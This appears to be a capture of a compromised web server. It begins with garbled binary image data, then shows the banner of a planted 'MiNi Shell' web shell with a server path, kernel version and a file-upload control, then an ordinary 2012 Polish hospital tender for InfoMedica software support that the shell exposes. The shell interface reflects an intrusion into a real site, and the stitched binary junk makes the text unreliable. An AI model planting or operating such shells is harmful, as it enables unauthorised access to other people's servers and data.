JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121112/444056-N-2012.html

<p class="kh_header"><b>Radom: Opieka serwisowa użytkowanego oprogramowania komputerowego InfoMedica firmy ASSECO oraz nadzór autorski oprogramowania aplikacyjnego InfoMedica   zainstalowanych w Radomskim Szpitalu Specjalistycznym</b><br>
<b>Numer ogłoszenia: 444056 - 2012; data zamieszczenia: 12.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Lekarska 4, 26-610 Radom, woj. mazowieckie, tel. 48 3615285, 3615284, faks 48 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opieka serwisowa użytkowanego oprogramowania komputerowego InfoMedica firmy ASSECO oraz nadzór autorski oprogramowania aplikacyjnego InfoMedica   zainstalowanych w Radomskim Szpitalu Specjalistycznym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część nr 1: Opieka serwisowa użytkowanego oprogramowania komputerowego InfoMedica firmy ASSECO
Opieka serwisowa użytkowanego oprogramowania komputerowego InfoMedica firmy ASSECO, zainstalowanego w Radomskim Szpitalu Specjalistycznym i zawierającego moduły:

Oprogramowanie aplikacyjne InfoMedica
Nazwa użytkowanego modułu	Ilość użytkowników	Termin rozpoczęcia
Finansowo - Księgowy	9	Od daty zawarcia umowy
Rachunek Kosztów	2	
Rejestr Sprzedaży	2	
Wycena Kosztów Normatywnych	2	
Gospodarka Materiałowa	4	
Środki Trwałe	1	
Wyposażenie	1	
Ruch Chorych	Otwarta	
Apteka	Otwarta	
Apteczka Oddziałowa	Otwarta	
Kadry	6	
Ewidencja Czasu Pracy (Grafiki)	Otwarta	
Płace	8	
Zlecenia	24	

Zobowiązania Wykonawcy:
1.	W ramach usług serwisu Wykonawca ma zapewnić:
a.	Instalowanie i wdrażanie aktualnych wersji oprogramowania aplikacyjnego InfoMedica;
b.	Instalowanie i wdrażanie nowej generacji oprogramowania aplikacyjnego (dotyczy modułów w części medycznej w zakresie przedmiotu umowy);
c.	Dostosowywanie konfiguracji oprogramowania aplikacyjnego InfoMedica do potrzeb zamawiającego między innymi pomoc w definiowaniu szablonów, sprawozdań, słowników, itp.;
d.	Udzielenia w razie potrzeby instrukcji w zakresie przygotowania różnorodnych raportów, sprawozdań, itp.;
e.	Doradztwo w zakresie przygotowywania danych przekazywanych przez Zamawiającego do jednostek nadrzędnych i współpracujących (np. do Narodowego Funduszu Zdrowia, Wydziału Zdrowia odpowiedniego Urzędu, banków itp.) w formie elektronicznej (np. dyskietki, łącza telekomunikacyjne, itp.);
f.	Konsultacje uzupełniające, pomoc użytkownikom w obsłudze oprogramowani aplikacyjnego (konsultacje i szkolenia mogą być prowadzone zdalnie na wskazanych stacjach użytkowników i przy pomocy telefonu;
g.	Doradztwo i pomoc przy administrowaniu bazą danych Oracle;
h.	Bieżące optymalizowanie konfiguracji oprogramowania uwzględniające potrzeby Zamawiającego;
i.	Pomoc w awaryjnym odtwarzaniu na wniosek Zamawiającego stanu oprogramowania i zgromadzonych  danych archiwalnych, poprawnie zabezpieczonych na odpowiednich nośnikach;
j.	Doradztwo w zakresie rozbudowy środków informatycznych;
k.	Pomoc w usunięciu awarii oprogramowania objętego niniejszą umową, powstałej z winy Zamawiającego lub wskutek wypadków losowych;
l.	Weryfikacja integralności baz danych;
m.	Dokonywanie ponownych instalacji oprogramowania w przypadkach rozbudowy infrastruktury informatycznej Zamawiającego;
n.	Korzystanie z konsultacji telefonicznych (Hot-Line);
o.	Prowadzenie rejestru kontaktów z Zamawiającym obejmującego wykonanie czynności w tym zmiany konfiguracji oprogramowania.
2.	Serwis ma być świadczony zdalnie za pomocą łączy. W przypadku braku możliwości wykonania usług serwisowych ta drogą, mają być one realizowane w siedzibie zamawiającego po dokładnej analizie każdego zgłoszenia.
3.	Wizyty serwisowe wymagające interwencji w siedzibie Zamawiającego muszą odbyć się w ciągu 48 godzin od momentu pisemnego potwierdzenia przyjęcia zgłoszenia.
4.	Świadczenie usług serwisowych w godzinach od 8.00 do 16.00 od poniedziałku do piątku z wyjątkiem dni ustawowo wolnych od pracy. Czas reakcji serwisu na pisemne zgłoszenia 48 godzin.
5.	W ciągu całego czasu trwania umowy nie istnieją ograniczenia: ilości wizyt serwisowych, liczby konsultacji telefonicznych (hot-line), liczby zdalnych sesji za pomocą łączy.

Część nr 2: Nadzór autorski Oprogramowania Aplikacyjnego InfoMedica
Nadzór autorski Oprogramowania Aplikacyjnego InfoMedica  zainstalowanego w Radomskim Szpitalu Specjalistycznym i zawierającego moduły:

Oprogramowanie aplikacyjne Infomedica
Nazwa modułu	Ilość użytkowników	Termin rozpoczęcia
Finansowo - Księgowy	9	Od daty zawarcia umowy
Rachunek Kosztów	2	
Rejestr Sprzedaży	2	
Wycena Kosztów Normatywnych	2	
Gospodarka Materiałowa	4	
Środki Trwałe	1	
Wyposażenie	1	
Ruch Chorych	Otwarta	
Apteka	Otwarta	
Apteczka Oddziałowa	Otwarta	
Kadry	6	
Ewidencja Czasu Pracy	Otwarta	
Płace	8	
Zlecenia	24	

Płatność w ratach miesięcznych.

Zobowiązania Wykonawcy :
W ramach nadzoru autorskiego Wykonawca winien zapewnić:
a.	udostępnienie poprawek do Oprogramowania Aplikacyjnego, w przypadku stwierdzenia przez Zamawiającego błędu Oprogramowania Aplikacyjnego (tzn. nie spowodowanego przez Zamawiającego powtarzalnego działania Oprogramowania Aplikacyjnego, w tym samym miejscu programu, prowadzącego w każdym przypadku do otrzymania błędnych wyników jego działania) :
w przypadku Błędu krytycznego:
1.	czas reakcji Wykonawcy na zgłoszenie Zamawiającego (tj. czas od otrzymania zgłoszenia do chwili podjęcia przez Wykonawcę czynności zmierzających do naprawy zgłoszonego Błędu krytycznego lub zmiany kwalifikacji błędu) wynosi 1 dzień roboczy;
2.	czas dokonania i udostępnienia Zamawiającemu odpowiednich korekt Oprogramowania Aplikacyjnego wyniesie do 3 dni roboczych, od chwili rozpoczęcia czynności serwisowych 
3.	w przypadku wystąpienia Błędu krytycznego Wykonawca może wprowadzić tzw. rozwiązanie tymczasowe, doraźnie rozwiązujące problem Błędu krytycznego; w takim przypadku dalsza obsługa usunięcia dotychczasowego Błędu krytycznego będzie traktowana jako błąd zwykły;
4.	Zamawiający udostępni Wykonawcy zdalny dostęp do baz danych i Oprogramowania Aplikacyjnego,  na zasadach określonych w załączniku do SIWZ. 
w pozostałych przypadkach:
1.	czas reakcji Wykonawcy na zgłoszenie Zamawiającego (tj. czas od otrzymania zgłoszenia do chwili podjęcia przez Wykonawcę czynności zmierzających do naprawy zgłoszonego Błędu lub zmiany kwalifikacji błędu) wynosi do 15 dni roboczych;
2.	czas dokonania i udostępnienia Zamawiającemu odpowiednich korekt Oprogramowania Aplikacyjnego wyniesie do 60 dni roboczych od chwili wpłynięcia zgłoszenia;
b.	w wyjątkowych wypadkach, za zgodą Zamawiającego, czas dokonania korekt będzie uzgodniony pomiędzy Wykonawcą i Zamawiającym; 
c.	zgłoszenie błędu przez Zamawiającego odbywać się będzie :
- poprzez witrynę internetową Help-Desku Wykonawcy
- telefonicznie pod numerem telefonu:
(1)- serwis InfoMedica część biała (medyczna )
(2)- serwis InfoMedica część szara (administracyjna)
- pisemnie na formularzu przesyłanym za pomocą poczty elektronicznej na adres 
  - opcjonalnie faksem na numer ;
W przypadku, gdy formularz zgłoszenia błędu zostanie przyjęty przez Wykonawcę:
(a)	w godzinach pomiędzy 16.00 a 24.00 dnia roboczego - traktowany będzie jak przyjęty o godz. 8.00 następnego dnia roboczego;
(b)	w godzinach pomiędzy 0.00 a 8.00 dnia roboczego - traktowany będzie jako przyjęty o godz. 8.00 danego dnia roboczego;
(c)	w dniu ustawowo lub dodatkowo wolnym od pracy - traktowany będzie jako przyjęty o godz. 8.00 najbliższego dnia roboczego; 
d.	rozwój Oprogramowania Aplikacyjnego objętego niniejszą Umową zgodnie ze zmieniającymi się powszechnie obowiązującymi przepisami prawa lub przepisami prawa wewnętrznie obowiązującymi wydanymi na podstawie delegacji ustawowej, z zastrzeżeniem, że Wykonawca zobowiązany jest do:
1.	przekazania Zamawiającemu informacji o nowych wersjach Oprogramowania Aplikacyjnego, ukazujących się średnio cztery (4) razy w roku, odbywać się będzie poprzez wysłanie pocztą elektroniczną na adres e-mail Zamawiającego;
2.	udostępniania uaktualnień Oprogramowania Aplikacyjnego (nowych wersji Oprogramowania Aplikacyjnego) poprzez serwer ftp: , przy czym na pisemne życzenie Zamawiającego, Wykonawca zobowiązuje się przygotować i wysłać na adres Zamawiającego nośnik CD-ROM zawierający nową wersję Oprogramowanie Aplikacyjnego;
3.	w ramach umowy Wykonawca zapewnia bezpłatną wymianę licencji na system informatyczny nowej generacji (dotyczy modułów w części medycznej).
e.	możliwość pisemnego zgłoszenia uwag i propozycji modyfikacji Oprogramowania Aplikacyjnego, wynikająca z zobowiązania Wykonawcy do dokonywania rozwoju Oprogramowania Aplikacyjnego; 
f.	gotowość przyjmowania i rozpatrywania indywidualnych żądań zmian (tj. modyfikacji płatnych) Oprogramowania Aplikacyjnego objętego niniejszą Umową. Zasady realizacji zgłoszonych żądań będą każdorazowo uzgadniane pomiędzy Wykonawcą i Zamawiającym.
g.	Korzystanie z usługi Hot-Line Wykonawcy.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.26.10.00-2, 72.26.30.00-6, 72.26.50.00-0, 72.26.70.00-4, 72.26.71.00-0, 72.26.00.00-5, 72.26.20.00-9, 72.26.72.00-1, 72.26.80.00-1, 48.61.00.00-7, 48.61.10.00-4, 48.61.40.00-5, 48.81.20.00-3, 48.81.40.00-7, 48.81.41.00-8, 48.81.42.00-9, 48.81.45.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dotyczy CZĘŚCI NR 1.
Wykonawca posiada odpowiednie doświadczenie niezbędne do wykonania przedmiotu zamówienia tj. wymagane wykonanie prac serwisowych w zakresie oprogramowania InfoMedica w co najmniej 3 szpitalach.
 	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni wykazać, że warunek określony powyżej spełniają łącznie.
	W przypadku, gdy w wykazie zamówień przedstawionym przez Wykonawcę rozliczenia między Wykonawcą, a Zamawiającym za wykonane zamówienie zostało dokonane w innej walucie niż w złotych polskich, Wykonawca (do celu oceny oferty) dokona przeliczenia wartości wykonanych zamówień w innej walucie niż złoty polski na  podstawie średniego kursu złotego w stosunku do walut obcych określonego w tabeli kursów średnich walut obcych Narodowego Banku Polskiego (http://www.nbp.pl) na dzień zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych tj. dn. 2012.11.12 .
	Ocena spełniania w/w warunku zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń  i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dotyczy CZĘŚCI NR 1.
Wykonawca posiada odpowiednią wiedzę i osoby zdolne do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, tzn. dysponuje :
a.	osobami posiadającymi odpowiednie certyfikaty w zakresie administrowania bazą danych - minimum Oracle 10g 
b.	osobami posiadającymi odpowiednie certyfikaty MCSA w zakresie zarządzania systemami operacyjnymi Microsoft;
c.	osobami posiadającymi wystawione przez producenta oprogramowania firmę ASSECO certyfikaty w zakresie świadczenia usług informatycznych dla oprogramowania InfoMedica tzn. instalacji, wdrażania, serwisowania oraz szkolenia użytkowników.
	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni wykazać, że warunek określony powyżej spełniają łącznie.
	Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">- dotyczy CZĘŚCI NR 1.
a) zaświadczenie odpowiednich podmiotów uprawnionych do potwierdzenia, iż Wykonawca spełnia określone wymogi jakościowe w zakresie świadczenia usług będących przedmiotem zamówienia np. certyfikat ISO 9001:2008 lub równoważnych dokumentów potwierdzających jakość świadczonych usług, jeżeli Wykonawca nie może w terminie uzyskać wymaganego zaświadczenia oraz wymogi dotyczące zapewnienia bezpieczeństwa przetwarzanych danych 
W przypadku wykonawców wspólnie ubiegających się o zamówienie dokument ten składa przynajmniej jeden z wykonawców.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty:
-Wpis do Krajowego Rejestru Sądowego lub ewidencji działalności gospodarczej - które mogą być złożone w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę lub
-Pełnomocnictwo - które może być złożone w oryginale lub w postaci kopii poświadczonej notarialnie,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dotyczy części nr 1:
a) Zmiana stawki podatku od towarów i usług (VAT) w trakcie obowiązywania niniejszej umowy, w odniesieniu do usług przewidzianych niniejszą umową, skutkuje, z dniem wejścia w życie nowej stawki VAT, zmianą wynagrodzenia brutto wykonawcy (parag. 5 pkt 1 umowy) w zakresie stawki VAT i wymaga aneksu do niniejszej umowy.
b) Przedmiotem zmian treści umowy mogą być również zmiany adresowe lub rejestrowe stron umowy oraz  zmiana statusu prawnego stron umowy i wymaga aneksu do niniejszej umowy.
Dotyczy części nr 2:
1)	Zmiana stawki podatku od towarów i usług (VAT) w trakcie obowiązywania niniejszej umowy, w odniesieniu do usług przewidzianych niniejszą umową, skutkuje, z dniem wejścia w życie nowej stawki VAT, zmianą wynagrodzenia brutto należnego wykonawcy oraz zmianą kalkulacji cenowej stanowiącej załącznik nr 1 do umowy w zakresie stawki VAT i wymaga aneksu do niniejszej umowy.
2)	Przedmiotem zmian treści umowy mogą być również zmiany adresowe lub rejestrowe stron umowy oraz  zmiana statusu prawnego stron umowy i wymaga aneksu do niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny, 26-610  Radom, ul. Lekarska 4, III piętro, w pok. nr 308 - Dział Zamówień Publicznych, Funduszy Strukturalnych i Zaopatrzenia..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.11.2012 godzina 10:00, miejsce: Radomski Szpital Specjalistyczny, 26-610  Radom, ul. Lekarska 4, III piętro, w pok. nr 308 - Dział Zamówień Publicznych, Funduszy Strukturalnych i Zaopatrzenia..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Opieka serwisowa użytkowanego oprogramowania komputerowego InfoMedica firmy ASSECO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Opieka serwisowa użytkowanego oprogramowania komputerowego InfoMedica firmy ASSECO, zainstalowanego w Radomskim Szpitalu Specjalistycznym i zawierającego moduły:

Oprogramowanie aplikacyjne InfoMedica
Nazwa użytkowanego modułu	Ilość użytkowników	Termin rozpoczęcia
Finansowo - Księgowy	9	Od daty zawarcia umowy
Rachunek Kosztów	2	
Rejestr Sprzedaży	2	
Wycena Kosztów Normatywnych	2	
Gospodarka Materiałowa	4	
Środki Trwałe	1	
Wyposażenie	1	
Ruch Chorych	Otwarta	
Apteka	Otwarta	
Apteczka Oddziałowa	Otwarta	
Kadry	6	
Ewidencja Czasu Pracy (Grafiki)	Otwarta	
Płace	8	
Zlecenia	24	

Zobowiązania Wykonawcy:
1.	W ramach usług serwisu Wykonawca ma zapewnić:
a.	Instalowanie i wdrażanie aktualnych wersji oprogramowania aplikacyjnego InfoMedica;
b.	Instalowanie i wdrażanie nowej generacji oprogramowania aplikacyjnego (dotyczy modułów w części medycznej w zakresie przedmiotu umowy);
c.	Dostosowywanie konfiguracji oprogramowania aplikacyjnego InfoMedica do potrzeb zamawiającego między innymi pomoc w definiowaniu szablonów, sprawozdań, słowników, itp.;
d.	Udzielenia w razie potrzeby instrukcji w zakresie przygotowania różnorodnych raportów, sprawozdań, itp.;
